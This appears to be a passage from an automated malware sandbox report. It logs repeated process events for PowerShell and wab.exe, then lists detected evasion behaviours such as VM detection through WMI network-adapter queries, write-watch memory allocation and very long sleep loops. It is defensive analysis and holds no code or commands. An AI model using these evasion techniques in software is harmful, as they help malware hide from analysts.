Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24400000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5536	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4388	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7375	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2318	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3806	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4054	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep count: 7375 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128	Thread sleep count: 2318 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164	Thread sleep count: 3806 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6164	Thread sleep count: 4054 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99734s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99625s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99391s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99276s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98813s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5824	Thread sleep time: -98703s >= -30000s	Jump to behavior
